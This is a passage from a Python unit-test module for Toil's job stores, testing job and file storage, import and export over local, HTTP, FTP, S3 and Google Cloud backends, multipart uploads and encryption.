self.assertEqual(jobstore1.load(childJob.jobStoreID), childJob)
self.assertEqual(jobstore2.load(childJob.jobStoreID), childJob)
@travis_test
def testJobDeletions(self):
"""Tests the consequences of deleting jobs."""
# A local jobstore object for testing.
jobstore = self.jobstore_initialized
jobNodeOnParent = JobNode(command='job1',
requirements=self.parentJobReqs,
jobName='test1', unitName='onJob',
jobStoreID=None, predecessorNumber=0)
# Create jobs
job = jobstore.create(jobNodeOnParent)
# Create child Jobs
jobNodeOnChild1 = JobNode(command='child1',
requirements=self.childJobReqs1,
jobName='test2', unitName='onChild1',
jobStoreID=None)
jobNodeOnChild2 = JobNode(command='job1',
requirements=self.childJobReqs2,
jobName='test3', unitName='onChild2',
jobStoreID=None)
# Add children to parent.
child1 = jobstore.create(jobNodeOnChild1)
child2 = jobstore.create(jobNodeOnChild2)
job.stack.append((child1, child2))
jobstore.update(job)
# Reminder: We are accessing the -1st element because we just appended.
# However, there should only be one element.
childJobs = [jobstore.load(childNode.jobStoreID) for childNode in job.stack[-1]]
# Test job iterator - the results of the iterator are effected by eventual
# consistency. We cannot guarantee all jobs will appear but we can assert that all
# jobs that show up are a subset of all existing jobs. If we had deleted jobs before
# this we would have to worry about ghost jobs appearing and this assertion would not
# be valid
self.assertTrue(set(childJobs + [job]) >= set(jobstore.jobs()))
# Test job deletions
# First delete parent, this should have no effect on the children
self.assertTrue(jobstore.exists(job.jobStoreID))
jobstore.delete(job.jobStoreID)
self.assertFalse(jobstore.exists(job.jobStoreID))
# Check the deletion of children
for childJob in childJobs:
self.assertTrue(jobstore.exists(childJob.jobStoreID))
jobstore.delete(childJob.jobStoreID)
self.assertFalse(jobstore.exists(childJob.jobStoreID))
self.assertRaises(NoSuchJobException, jobstore.load, childJob.jobStoreID)
try:
with jobstore.readSharedFileStream('missing') as _:
pass
self.fail('Expecting NoSuchFileException')
except NoSuchFileException:
pass
@travis_test
def testSharedFiles(self):
"""Tests the sharing of files."""
jobstore1 = self.jobstore_initialized
jobstore2 = self.jobstore_resumed_noconfig
bar = 'bar'
if sys.version_info >= (3, 0):
bar = b'bar'
with jobstore1.writeSharedFileStream('foo') as f:
f.write(bar)
# ... read that file on worker, ...
with jobstore2.readSharedFileStream('foo') as f:
self.assertEqual(bar, f.read())
# ... and read it again on jobstore1.
with jobstore1.readSharedFileStream('foo') as f:
self.assertEqual(bar, f.read())
with jobstore1.writeSharedFileStream('nonEncrypted', isProtected=False) as f:
f.write(bar)
self.assertUrl(jobstore1.getSharedPublicUrl('nonEncrypted'))
self.assertRaises(NoSuchFileException, jobstore1.getSharedPublicUrl, 'missing')
@travis_test
def testPerJobFiles(self):
"""Tests the behavior of files on jobs."""
jobstore1 = self.jobstore_initialized
jobstore2 = self.jobstore_resumed_noconfig
# Create jobNodeOnJS1
jobNodeOnJobStore1 = JobNode(command='job1',
requirements=self.parentJobReqs,
jobName='test1', unitName='onJobStore1',
jobStoreID=None, predecessorNumber=0)
# First recreate job
jobOnJobStore1 = jobstore1.create(jobNodeOnJobStore1)
fileOne = jobstore2.getEmptyFileStoreID(jobOnJobStore1.jobStoreID, cleanup=True)
# Check file exists
self.assertTrue(jobstore2.fileExists(fileOne))
self.assertTrue(jobstore1.fileExists(fileOne))
one = 'one'
two = 'two'
three = 'three'
if sys.version_info >= (3, 0):
one = b'one'
two = b'two'
three = b'three'
# ... write to the file on jobstore2, ...
with jobstore2.updateFileStream(fileOne) as f:
f.write(one)
# ... read the file as a stream on the jobstore1, ....
with jobstore1.readFileStream(fileOne) as f:
self.assertEqual(f.read(), one)
# ... and copy it to a temporary physical file on the jobstore1.
fh, path = tempfile.mkstemp()
try:
os.close(fh)
tmpPath = path + '.read-only'
jobstore1.readFile(fileOne, tmpPath)
try:
shutil.copyfile(tmpPath, path)
finally:
os.unlink(tmpPath)
with open(path, 'rb+') as f:
self.assertEqual(f.read(), one)
# Write a different string to the local file ...
f.seek(0)
f.truncate(0)
f.write(two)
# ... and create a second file from the local file.
fileTwo = jobstore1.writeFile(path, jobOnJobStore1.jobStoreID, cleanup=True)
with jobstore2.readFileStream(fileTwo) as f:
self.assertEqual(f.read(), two)
# Now update the first file from the local file ...
jobstore1.updateFile(fileOne, path)
with jobstore2.readFileStream(fileOne) as f:
self.assertEqual(f.read(), two)
finally:
os.unlink(path)
# Create a third file to test the last remaining method.
with jobstore2.writeFileStream(jobOnJobStore1.jobStoreID, cleanup=True) as (f, fileThree):
f.write(three)
with jobstore1.readFileStream(fileThree) as f:
self.assertEqual(f.read(), three)
# Delete a file explicitly but leave files for the implicit deletion through the parent
jobstore2.deleteFile(fileOne)
# Check the file is gone
#
for store in jobstore2, jobstore1:
self.assertFalse(store.fileExists(fileOne))
self.assertRaises(NoSuchFileException, store.readFile, fileOne, '')
try:
with store.readFileStream(fileOne) as _:
pass
self.fail('Expecting NoSuchFileException')
except NoSuchFileException:
pass
@travis_test
def testStatsAndLogging(self):
"""Tests behavior of reading and writting stats and logging."""
jobstore1 = self.jobstore_initialized
jobstore2 = self.jobstore_resumed_noconfig
jobNodeOnJobStore1 = JobNode(command='job1',
requirements=self.parentJobReqs,
jobName='test1', unitName='onJobStore1',
jobStoreID=None, predecessorNumber=0)
jobOnJobStore1 = jobstore1.create(jobNodeOnJobStore1)
# Test stats and logging
stats = None
one = b'one' if not USING_PYTHON2 else 'one'
two = b'two' if not USING_PYTHON2 else 'two'
# Allows stats to be read/written to/from in read/writeStatsAndLogging.
def callback(f2):
stats.add(f2.read())
# Collects stats and logging messages.
stats = set()
# No stats or logging added yet. Expect nothing.
self.assertEqual(0, jobstore1.readStatsAndLogging(callback))
self.assertEqual(set(), stats)
# Test writing and reading.
jobstore2.writeStatsAndLogging(one)
self.assertEqual(1, jobstore1.readStatsAndLogging(callback))
self.assertEqual({one}, stats)
self.assertEqual(0, jobstore1.readStatsAndLogging(callback)) # readStatsAndLogging purges saved stats etc
jobstore2.writeStatsAndLogging(one)
jobstore2.writeStatsAndLogging(two)
stats = set()
self.assertEqual(2, jobstore1.readStatsAndLogging(callback))
self.assertEqual({one, two}, stats)
largeLogEntry = os.urandom(self._largeLogEntrySize())
stats = set()
jobstore2.writeStatsAndLogging(largeLogEntry)
self.assertEqual(1, jobstore1.readStatsAndLogging(callback))
self.assertEqual({largeLogEntry}, stats)
# test the readAll parameter
self.assertEqual(4, jobstore1.readStatsAndLogging(callback, readAll=True))
# Delete parent
jobstore1.delete(jobOnJobStore1.jobStoreID)
self.assertFalse(jobstore1.exists(jobOnJobStore1.jobStoreID))
# TODO: Who deletes the shared files?
@travis_test
def testWriteLogFiles(self):
"""Test writing log files."""
jobNames = ['testStatsAndLogging_writeLogFiles']
jobLogList = ['string', b'bytes', '', b'newline\n']
config = self._createConfig()
setattr(config, 'writeLogs', '.')
setattr(config, 'writeLogsGzip', None)
StatsAndLogging.writeLogFiles(jobNames, jobLogList, config)
jobLogFile = os.path.join(config.writeLogs, jobNames[0] + '000.log')
self.assertTrue(os.path.isfile(jobLogFile))
with open(jobLogFile, 'r') as f:
self.assertEqual(f.read(), 'string\nbytes\n\nnewline\n')
os.remove(jobLogFile)
@travis_test
def testBatchCreate(self):
"""Test creation of many jobs."""
jobstore = self.jobstore_initialized
jobRequirements = dict(memory=12, cores=34, disk=35, preemptable=True)
jobGraphs = []
with jobstore.batch():
for i in range(100):
overlargeJobNode = JobNode(command='overlarge',
requirements=jobRequirements,
jobName='test-overlarge', unitName='onJobStore',
jobStoreID=None, predecessorNumber=0)
jobGraphs.append(jobstore.create(overlargeJobNode))
for jobGraph in jobGraphs:
self.assertTrue(jobstore.exists(jobGraph.jobStoreID))
@travis_test
def testGrowingAndShrinkingJob(self):
"""Make sure jobs update correctly if they grow/shrink."""
# Make some very large data, large enough to trigger
# overlarge job creation if that's a thing
# (i.e. AWSJobStore)
arbitraryLargeData = os.urandom(500000)
job = self.jobstore_initialized.create(self.arbitraryJob)
# Make the job grow
job.foo_attribute = arbitraryLargeData
self.jobstore_initialized.update(job)
check_job = self.jobstore_initialized.load(job.jobStoreID)
self.assertEqual(check_job.foo_attribute, arbitraryLargeData)
# Make the job shrink back close to its original size
job.foo_attribute = None
self.jobstore_initialized.update(job)
check_job = self.jobstore_initialized.load(job.jobStoreID)
self.assertEqual(check_job.foo_attribute, None)
def _prepareTestFile(self, store, size=None):
"""
Generates a URL that can be used to point at a test file in the storage mechanism
used by the job store under test by this class. Optionally creates a file at that URL.
:param: store: an object referencing the store, same type as _createExternalStore's
return value
:param int size: The size of the test file to be created.
:return: the URL, or a tuple (url, md5) where md5 is the file's hexadecimal MD5 digest
:rtype: str|(str,str)
"""
raise NotImplementedError()
@abstractmethod
def _hashTestFile(self, url):
"""
Returns hexadecimal MD5 digest of the contents of the file pointed at by the URL.
"""
raise NotImplementedError()
@abstractmethod
def _createExternalStore(self):
raise NotImplementedError()
@abstractmethod
def _cleanUpExternalStore(self, store):
"""
:param: store: an object referencing the store, same type as _createExternalStore's
return value
"""
raise NotImplementedError()
externalStoreCache = {}
def _externalStore(self):
try:
store = self.externalStoreCache[self]
except KeyError:
logger.debug('Creating new external store for %s', self)
store = self.externalStoreCache[self] = self._createExternalStore()
else:
logger.debug('Reusing external store for %s', self)
return store
@classmethod
def cleanUpExternalStores(cls):
for test, store in iteritems(cls.externalStoreCache):
logger.debug('Cleaning up external store for %s.', test)
test._cleanUpExternalStore(store)
mpTestPartSize = 5 << 20
@classmethod
def makeImportExportTests(cls):
testClasses = [FileJobStoreTest, AWSJobStoreTest, GoogleJobStoreTest]
activeTestClassesByName = {testCls.__name__: testCls
for testCls in testClasses
if not getattr(testCls, '__unittest_skip__', False)}
def testImportExportFile(self, otherCls, size, moveExports):
"""
:param AbstractJobStoreTest.Test self: the current test case
:param AbstractJobStoreTest.Test otherCls: the test case class for the job store
to import from or export to
:param int size: the size of the file to test importing/exporting with
"""
# Prepare test file in other job store
self.jobstore_initialized.partSize = cls.mpTestPartSize
self.jobstore_initialized.moveExports = moveExports
# The string in otherCls() is arbitrary as long as it returns a class that has access
# to ._externalStore() and ._prepareTestFile()
other = otherCls('testSharedFiles')
store = other._externalStore()
srcUrl, srcMd5 = other._prepareTestFile(store, size)
# Import into job store under test
jobStoreFileID = self.jobstore_initialized.importFile(srcUrl)
self.assertTrue(isinstance(jobStoreFileID, FileID))
with self.jobstore_initialized.readFileStream(jobStoreFileID) as f:
fileMD5 = hashlib.md5(f.read()).hexdigest()
self.assertEqual(fileMD5, srcMd5)
# Export back into other job store
dstUrl = other._prepareTestFile(store)
self.jobstore_initialized.exportFile(jobStoreFileID, dstUrl)
self.assertEqual(fileMD5, other._hashTestFile(dstUrl))
if otherCls.__name__ == 'FileJobStoreTest':
if isinstance(self.jobstore_initialized, FileJobStore):
jobStorePath = self.jobstore_initialized._getFilePathFromId(jobStoreFileID)
jobStoreHasLink = os.path.islink(jobStorePath)
if self.jobstore_initialized.moveExports:
# Ensure the export performed a move / link
self.assertTrue(jobStoreHasLink)
self.assertEqual(os.path.realpath(jobStorePath), dstUrl[7:])
else:
# Ensure the export has not moved the job store file
self.assertFalse(jobStoreHasLink)
# Remove local Files
os.remove(srcUrl[7:])
os.remove(dstUrl[7:])
make_tests(testImportExportFile, cls, otherCls=activeTestClassesByName,
size=dict(zero=0,
one=1,
oneMiB=2 ** 20,
partSizeMinusOne=cls.mpTestPartSize - 1,
partSize=cls.mpTestPartSize,
partSizePlusOne=cls.mpTestPartSize + 1),
moveExports={'deactivated': None, 'activated': True})
def testImportSharedFile(self, otherCls):
"""
:param AbstractJobStoreTest.Test self: the current test case
:param AbstractJobStoreTest.Test otherCls: the test case class for the job store
to import from or export to
"""
# Prepare test file in other job store
self.jobstore_initialized.partSize = cls.mpTestPartSize
other = otherCls('testSharedFiles')
store = other._externalStore()
srcUrl, srcMd5 = other._prepareTestFile(store, 42)
# Import into job store under test
self.assertIsNone(self.jobstore_initialized.importFile(srcUrl, sharedFileName='foo'))
with self.jobstore_initialized.readSharedFileStream('foo') as f:
fileMD5 = hashlib.md5(f.read()).hexdigest()
self.assertEqual(fileMD5, srcMd5)
if otherCls.__name__ == 'FileJobStoreTest': # Remove local Files
os.remove(srcUrl[7:])
make_tests(testImportSharedFile,
cls,
otherCls=activeTestClassesByName)
@travis_test
def testImportHttpFile(self):
'''Test importing a file over HTTP.'''
http = socketserver.TCPServer(('', 0), StubHttpRequestHandler)
try:
httpThread = threading.Thread(target=http.serve_forever)
httpThread.start()
try:
assignedPort = http.server_address[1]
url = 'http://localhost:%d' % assignedPort
with self.jobstore_initialized.readFileStream(
self.jobstore_initialized.importFile(url)) as readable:
f1 = readable.read()
f2 = StubHttpRequestHandler.fileContents
if isinstance(f1, bytes) and not isinstance(f2, bytes):
f1 = f1.decode()
if isinstance(f2, bytes) and not isinstance(f1, bytes):
f1 = f1.encode()
self.assertEqual(f1, f2)
finally:
http.shutdown()
httpThread.join()
finally:
http.server_close()
@travis_test
def testImportFtpFile(self):
'''Test importing a file over FTP'''
ftpfile = {'name': 'foo', 'content': 'foo bar baz qux'}
ftp = FTPStubServer(0)
ftp.run()
try:
ftp.add_file(**ftpfile)
assignedPort = ftp.server.server_address[1]
url = 'ftp://user1:passwd@localhost:%d/%s' % (assignedPort, ftpfile['name'])
with self.jobstore_initialized.readFileStream(self.jobstore_initialized.importFile(url)) as readable:
imported_content = readable.read()
# python 2/3 string/bytestring compat
if isinstance(imported_content, bytes):
imported_content = imported_content.decode('utf-8')
self.assertEqual(imported_content, ftpfile['content'])
finally:
ftp.stop()
@slow
def testFileDeletion(self):
"""
Intended to cover the batch deletion of items in the AWSJobStore, but it doesn't hurt
running it on the other job stores.
"""
n = self._batchDeletionSize()
for numFiles in (1, n - 1, n, n + 1, 2 * n):
job = self.jobstore_initialized.create(self.arbitraryJob)
fileIDs = [self.jobstore_initialized.getEmptyFileStoreID(job.jobStoreID, cleanup=True) for _ in
range(0, numFiles)]
self.jobstore_initialized.delete(job.jobStoreID)
for fileID in fileIDs:
# NB: the fooStream() methods return context managers
self.assertRaises(NoSuchFileException, self.jobstore_initialized.readFileStream(fileID).__enter__)
@slow
def testMultipartUploads(self):
"""
This test is meant to cover multi-part uploads in the AWSJobStore but it doesn't hurt
running it against the other job stores as well.
"""
# http://unix.stackexchange.com/questions/11946/how-big-is-the-pipe-buffer
bufSize = 65536
partSize = self._partSize()
self.assertEqual(partSize % bufSize, 0)
job = self.jobstore_initialized.create(self.arbitraryJob)
# Test file/stream ending on part boundary and within a part
for partsPerFile in (1, 2.33):
checksum = hashlib.md5()
checksumQueue = Queue(2)
# FIXME: Having a separate thread is probably overkill here
def checksumThreadFn():
while True:
_buf = checksumQueue.get()
if _buf is None:
break
checksum.update(_buf)
# Multipart upload from stream
checksumThread = Thread(target=checksumThreadFn)
checksumThread.start()
try:
# Should not block. On Linux, /dev/random blocks when it's running low on entropy
with open('/dev/urandom', 'rb') as readable:
with self.jobstore_initialized.writeFileStream(job.jobStoreID, cleanup=True) as (
writable, fileId):
for i in range(int(partSize * partsPerFile / bufSize)):
buf = readable.read(bufSize)
checksumQueue.put(buf)
writable.write(buf)
finally:
checksumQueue.put(None)
checksumThread.join()
before = checksum.hexdigest()
# Verify
checksum = hashlib.md5()
with self.jobstore_initialized.readFileStream(fileId) as readable:
while True:
buf = readable.read(bufSize)
if not buf:
break
checksum.update(buf)
after = checksum.hexdigest()
self.assertEqual(before, after)
# Multi-part upload from file
checksum = hashlib.md5()
fh, path = tempfile.mkstemp()
try:
with os.fdopen(fh, 'wb+') as writable:
with open('/dev/urandom', 'rb') as readable:
for i in range(int(partSize * partsPerFile / bufSize)):
buf = readable.read(bufSize)
writable.write(buf)
checksum.update(buf)
fileId = self.jobstore_initialized.writeFile(path, job.jobStoreID, cleanup=True)
finally:
os.unlink(path)
before = checksum.hexdigest()
# Verify
checksum = hashlib.md5()
with self.jobstore_initialized.readFileStream(fileId) as readable:
while True:
buf = readable.read(bufSize)
if not buf:
break
checksum.update(buf)
after = checksum.hexdigest()
self.assertEqual(before, after)
self.jobstore_initialized.delete(job.jobStoreID)
@travis_test
def testZeroLengthFiles(self):
'''Test reading and writing of empty files.'''
job = self.jobstore_initialized.create(self.arbitraryJob)
nullFile = self.jobstore_initialized.writeFile('/dev/null', job.jobStoreID, cleanup=True)
with self.jobstore_initialized.readFileStream(nullFile) as f:
assert not f.read()
with self.jobstore_initialized.writeFileStream(job.jobStoreID, cleanup=True) as (f, nullStream):
pass
with self.jobstore_initialized.readFileStream(nullStream) as f:
assert not f.read()
self.jobstore_initialized.delete(job.jobStoreID)
@slow
def testLargeFile(self):
'''Test the reading and writing of large files.'''
# Write a large file.
dirPath = self._createTempDir()
filePath = os.path.join(dirPath, 'large')
hashIn = hashlib.md5()
with open(filePath, 'wb') as f:
for i in range(0, 10):
buf = os.urandom(self._partSize())
f.write(buf)
hashIn.update(buf)
# Load the file into a jobstore.
job = self.jobstore_initialized.create(self.arbitraryJob)
jobStoreFileID = self.jobstore_initialized.writeFile(filePath, job.jobStoreID, cleanup=True)
# Remove the local file.
os.unlink(filePath)
# Write a local copy of the file from the jobstore.
self.jobstore_initialized.readFile(jobStoreFileID, filePath)
# Reread the file to confirm success.
hashOut = hashlib.md5()
with open(filePath, 'rb') as f:
while True:
buf = f.read(self._partSize())
if not buf:
break
hashOut.update(buf)
self.assertEqual(hashIn.digest(), hashOut.digest())
def assertUrl(self, url):
prefix, path = url.split(':', 1)
if prefix == 'file':
self.assertTrue(os.path.exists(path))
else:
try:
urlopen(Request(url))
except:
self.fail()
@slow
def testCleanCache(self):
# Make a bunch of jobs
jobstore = self.jobstore_initialized
# Create parent job
rootJob = jobstore.createRootJob(self.arbitraryJob)
# Create a bunch of child jobs
for i in range(100):
child = jobstore.create(self.arbitraryJob)
rootJob.stack.append([child])
jobstore.update(rootJob)
# See how long it takes to clean with no cache
noCacheStart = time.time()
jobstore.clean()
noCacheEnd = time.time()
noCacheTime = noCacheEnd - noCacheStart
# Make sure we have all the jobs: root and children.
self.assertEqual(len(list(jobstore.jobs())), 101)
# See how long it takes to clean with cache
jobCache = {jobGraph.jobStoreID: jobGraph
for jobGraph in jobstore.jobs()}
cacheStart = time.time()
jobstore.clean(jobCache)
cacheEnd = time.time()
cacheTime = cacheEnd - cacheStart
logger.debug("Without cache: %f, with cache: %f.", noCacheTime, cacheTime)
# Running with the cache should be faster.
self.assertTrue(cacheTime <= noCacheTime)
# NB: the 'thread' method seems to be needed here to actually
# ensure the timeout is raised, probably because the only
# "live" thread doesn't hold the GIL.
@travis_test
@pytest.mark.timeout(45, method='thread')
def testPartialReadFromStream(self):
"""Test whether readFileStream will deadlock on a partial read."""
job = self.jobstore_initialized.create(self.arbitraryJob)
with self.jobstore_initialized.writeFileStream(job.jobStoreID, cleanup=True) as (f, fileID):
# Write enough data to make sure the writer thread
# will get blocked on the write. Technically anything
# greater than the pipe buffer size plus the libc
# buffer size (64K + 4K(?)) should trigger this bug,
# but this gives us a lot of extra room just to be sure.
# python 3 requires self.fileContents to be a bytestring
a = 'a'
if sys.version_info >= (3, 0):
a = b'a'
f.write(a * 300000)
with self.jobstore_initialized.readFileStream(fileID) as f:
self.assertEqual(f.read(1), a)
# If it times out here, there's a deadlock
@abstractmethod
def _corruptJobStore(self):
"""
Deletes some part of the physical storage represented by a job store.
"""
raise NotImplementedError()
@slow
def testDestructionOfCorruptedJobStore(self):
self._corruptJobStore()
jobstore = self._createJobStore()
jobstore.destroy()
# Note that self.jobstore_initialized.destroy() is done as part of shutdown
@travis_test
def testDestructionIdempotence(self):
# Jobstore is fully initialized
self.jobstore_initialized.destroy()
# Create a second instance for the same physical storage but do not .initialize() or
# .resume() it.
cleaner = self._createJobStore()
cleaner.destroy()
# And repeat
self.jobstore_initialized.destroy()
cleaner = self._createJobStore()
cleaner.destroy()
@travis_test
def testEmptyFileStoreIDIsReadable(self):
"""Simply creates an empty fileStoreID and attempts to read from it."""
id = self.jobstore_initialized.getEmptyFileStoreID()
fh, path = tempfile.mkstemp()
try:
self.jobstore_initialized.readFile(id, path)
self.assertTrue(os.path.isfile(path))
finally:
os.unlink(path)
def _largeLogEntrySize(self):
"""
Sub-classes may want to override these in order to maximize test coverage
"""
return 1 * 1024 * 1024
def _batchDeletionSize(self):
return 10
def _partSize(self):
return 5 * 1024 * 1024
class AbstractEncryptedJobStoreTest(object):
# noinspection PyAbstractClass
class Test(with_metaclass(ABCMeta, AbstractJobStoreTest.Test)):
"""
A test of job stores that use encryption
"""
def setUp(self):
# noinspection PyAttributeOutsideInit
self.sseKeyDir = tempfile.mkdtemp()
super(AbstractEncryptedJobStoreTest.Test, self).setUp()
def tearDown(self):
super(AbstractEncryptedJobStoreTest.Test, self).tearDown()
shutil.rmtree(self.sseKeyDir)
def _createConfig(self):
config = super(AbstractEncryptedJobStoreTest.Test, self)._createConfig()
sseKeyFile = os.path.join(self.sseKeyDir, 'keyFile')
with open(sseKeyFile, 'w') as f:
f.write('01234567890123456789012345678901')
config.sseKey = sseKeyFile
# config.attrib['sse_key'] = sseKeyFile
return config
def testEncrypted(self):
"""
Create an encrypted file. Read it in encrypted mode then try with encryption off
to ensure that it fails.
"""
phrase = 'This file is encrypted.'.encode('utf-8')
fileName = 'foo'
with self.jobstore_initialized.writeSharedFileStream(fileName, isProtected=True) as f:
f.write(phrase)
with self.jobstore_initialized.readSharedFileStream(fileName) as f:
self.assertEqual(phrase, f.read())
# disable encryption
self.jobstore_initialized.config.sseKey = None
try:
with self.jobstore_initialized.readSharedFileStream(fileName) as f:
self.assertEqual(phrase, f.read())
except AssertionError as e:
self.assertEqual("Content is encrypted but no key was provided.", e.args[0])
else:
self.fail("Read encryption content with encryption off.")
class FileJobStoreTest(AbstractJobStoreTest.Test):
def _createJobStore(self):
# Make a FileJobStore with an artificially low fan out threshold, to
# make sure to test fan out logic
return FileJobStore(self.namePrefix, fanOut=2)
def _corruptJobStore(self):
assert isinstance(self.jobstore_initialized, FileJobStore) # type hint
shutil.rmtree(self.jobstore_initialized.jobStoreDir)
def _prepareTestFile(self, dirPath, size=None):
fileName = 'testfile_%s' % uuid.uuid4()
localFilePath = dirPath + fileName
url = 'file://%s' % localFilePath
if size is None:
return url
else:
content = os.urandom(size)
with open(localFilePath, 'wb') as writable:
writable.write(content)
return url, hashlib.md5(content).hexdigest()
def _hashTestFile(self, url):
localFilePath = FileJobStore._extractPathFromUrl(urlparse.urlparse(url))
with open(localFilePath, 'rb') as f:
return hashlib.md5(f.read()).hexdigest()
def _createExternalStore(self):
return tempfile.mkdtemp()
def _cleanUpExternalStore(self, dirPath):
shutil.rmtree(dirPath)
@travis_test
def testPreserveFileName(self):
"Check that the fileID ends with the given file name."
fh, path = tempfile.mkstemp()
try:
os.close(fh)
job = self.jobstore_initialized.create(self.arbitraryJob)
fileID = self.jobstore_initialized.writeFile(path, job.jobStoreID, cleanup=True)
self.assertTrue(fileID.endswith(os.path.basename(path)))
finally:
os.unlink(path)
@needs_google
class GoogleJobStoreTest(AbstractJobStoreTest.Test):
projectID = os.getenv('TOIL_GOOGLE_PROJECTID')
headers = {"x-goog-project-id": projectID}
def _createJobStore(self):
from toil.jobStores.googleJobStore import GoogleJobStore
return GoogleJobStore(GoogleJobStoreTest.projectID + ":" + self.namePrefix)
def _corruptJobStore(self):
# The Google job store has only one resource, the bucket, so we can't corrupt it without
# fully deleting it.
pass
def _prepareTestFile(self, bucket, size=None):
from toil.jobStores.googleJobStore import GoogleJobStore
fileName = 'testfile_%s' % uuid.uuid4()
url = 'gs://%s/%s' % (bucket.name, fileName)
if size is None:
return url
read_type = 'r' if USING_PYTHON2 else 'rb'
with open('/dev/urandom', read_type) as readable:
if USING_PYTHON2:
contents = readable.read(size)
else:
contents = str(readable.read(size))
GoogleJobStore._writeToUrl(StringIO(contents), urlparse.urlparse(url))
return url, hashlib.md5(contents).hexdigest()
def _hashTestFile(self, url):
from toil.jobStores.googleJobStore import GoogleJobStore
contents = GoogleJobStore._getBlobFromURL(urlparse.urlparse(url)).download_as_string()
return hashlib.md5(contents).hexdigest()
@googleRetry
def _createExternalStore(self):
from google.cloud import storage
bucketName = ("import-export-test-" + str(uuid.uuid4()))
storageClient = storage.Client()
return storageClient.create_bucket(bucketName)
@googleRetry
def _cleanUpExternalStore(self, bucket):
# this is copied from googleJobStore.destroy
try:
bucket.delete(force=True)
# throws ValueError if bucket has more than 256 objects. Then we must delete manually
except ValueError:
bucket.delete_blobs(bucket.list_blobs)
bucket.delete()
@needs_aws_s3
class AWSJobStoreTest(AbstractJobStoreTest.Test):
def _createJobStore(self):
from toil.jobStores.aws.jobStore import AWSJobStore
partSize = self._partSize()
return AWSJobStore(self.awsRegion() + ':' + self.namePrefix, partSize=partSize)
def _corruptJobStore(self):
from toil.jobStores.aws.jobStore import AWSJobStore
assert isinstance(self.jobstore_initialized, AWSJobStore) # type hinting
self.jobstore_initialized.destroy()
def testSDBDomainsDeletedOnFailedJobstoreBucketCreation(self):
"""
This test ensures that SDB domains bound to a jobstore are deleted if the jobstore bucket
failed to be created. We simulate a failed jobstore bucket creation by using a bucket in a
different region with the same name.
"""
from boto.sdb import connect_to_region
from boto.s3.connection import Location, S3Connection
from boto.exception import S3ResponseError
from toil.jobStores.aws.jobStore import BucketLocationConflictException
from toil.jobStores.aws.utils import retry_s3
externalAWSLocation = Location.USWest
for testRegion in 'us-east-1', 'us-west-2':
# We run this test twice, once with the default s3 server us-east-1 as the test region
# and once with another server (us-west-2). The external server is always us-west-1.
# This incidentally tests that the BucketLocationConflictException is thrown when using
# both the default, and a non-default server.
testJobStoreUUID = str(uuid.uuid4())
# Create the bucket at the external region
s3 = S3Connection()
for attempt in retry_s3(delays=(2, 5, 10, 30, 60), timeout=600):
with attempt:
bucket = s3.create_bucket('domain-test-' + testJobStoreUUID + '--files',
location=externalAWSLocation)
options = Job.Runner.getDefaultOptions('aws:' + testRegion + ':domain-test-' +
testJobStoreUUID)
options.logLevel = 'DEBUG'
try:
with Toil(options) as toil:
pass
except BucketLocationConflictException:
# Catch the expected BucketLocationConflictException and ensure that the bound
# domains don't exist in SDB.
sdb = connect_to_region(self.awsRegion())
next_token = None
allDomainNames = []
while True:
domains = sdb.get_all_domains(max_domains=100, next_token=next_token)
allDomainNames.extend([x.name for x in domains])
next_token = domains.next_token
if next_token is None:
break
self.assertFalse([d for d in allDomainNames if testJobStoreUUID in d])
else:
self.fail()
finally:
try:
for attempt in retry_s3():
with attempt:
s3.delete_bucket(bucket=bucket)
except S3ResponseError as e:
# The actual HTTP code of the error is in status.
# See https://github.com/boto/boto/blob/91ba037e54ef521c379263b0ac769c66182527d7/boto/exception.py#L77-L80
# See also: https://github.com/boto/boto/blob/91ba037e54ef521c379263b0ac769c66182527d7/boto/exception.py#L154-L156
if e.status == 404:
# The bucket doesn't exist; maybe a failed delete actually succeeded.
pass
else:
raise
@slow
def testInlinedFiles(self):
from toil.jobStores.aws.jobStore import AWSJobStore
jobstore = self.jobstore_initialized
for encrypted in (True, False):
n = AWSJobStore.FileInfo.maxInlinedSize()
sizes = (1, old_div(n, 2), n - 1, n, n + 1, 2 * n)
for size in chain(sizes, islice(reversed(sizes), 1)):
s = os.urandom(size)
with jobstore.writeSharedFileStream('foo') as f:
f.write(s)
with jobstore.readSharedFileStream('foo') as f:
self.assertEqual(s, f.read())
def testOverlargeJob(self):
jobstore = self.jobstore_initialized
jobRequirements = dict(memory=12, cores=34, disk=35, preemptable=True)
overlargeJobNode = JobNode(command='overlarge',
requirements=jobRequirements,
jobName='test-overlarge', unitName='onJobStore',
jobStoreID=None, predecessorNumber=0)
# Make the pickled size of the job larger than 256K
read_type = 'r' if USING_PYTHON2 else 'rb'
with open("/dev/urandom", read_type) as random:
if USING_PYTHON2:
overlargeJobNode.jobName = random.read(512 * 1024)
else:
overlargeJobNode.jobName = str(random.read(512 * 1024))
overlargeJob = jobstore.create(overlargeJobNode)
self.assertTrue(jobstore.exists(overlargeJob.jobStoreID))
overlargeJobDownloaded = jobstore.load(overlargeJob.jobStoreID)
jobsInJobStore = [job for job in jobstore.jobs()]
self.assertEqual(jobsInJobStore, [overlargeJob])
jobstore.delete(overlargeJob.jobStoreID)
def _prepareTestFile(self, bucket, size=None):
fileName = 'testfile_%s' % uuid.uuid4()
url = 's3://%s/%s' % (bucket.name, fileName)
if size is None:
return url
read_type = 'r' if USING_PYTHON2 else 'rb'
with open('/dev/urandom', read_type) as readable:
if USING_PYTHON2:
bucket.new_key(fileName).set_contents_from_string(readable.read(size))
else:
bucket.new_key(fileName).set_contents_from_string(str(readable.read(size)))
return url, hashlib.md5(bucket.get_key(fileName).get_contents_as_string()).hexdigest()
def _hashTestFile(self, url):
from toil.jobStores.aws.jobStore import AWSJobStore
key = AWSJobStore._getKeyForUrl(urlparse.urlparse(url), existing=True)
try:
contents = key.get_contents_as_string()
finally:
key.bucket.connection.close()
return hashlib.md5(contents).hexdigest()
def _createExternalStore(self):
import boto.s3
from toil.jobStores.aws.utils import region_to_bucket_location
s3 = boto.s3.connect_to_region(self.awsRegion())
try:
return s3.create_bucket(bucket_name='import-export-test-%s' % uuid.uuid4(),
location=region_to_bucket_location(self.awsRegion()))
except:
with panic(log=logger):
s3.close()
def _cleanUpExternalStore(self, bucket):
try:
for key in bucket.list():
key.delete()
bucket.delete()
finally:
bucket.connection.close()
def _largeLogEntrySize(self):
from toil.jobStores.aws.jobStore import AWSJobStore
# So we get into the else branch of reader() in uploadStream(multiPart=False):
return AWSJobStore.FileInfo.maxBinarySize() * 2
def _batchDeletionSize(self):
from toil.jobStores.aws.jobStore import AWSJobStore
return AWSJobStore.itemsPerBatchDelete
@needs_aws_s3
class InvalidAWSJobStoreTest(ToilTest):
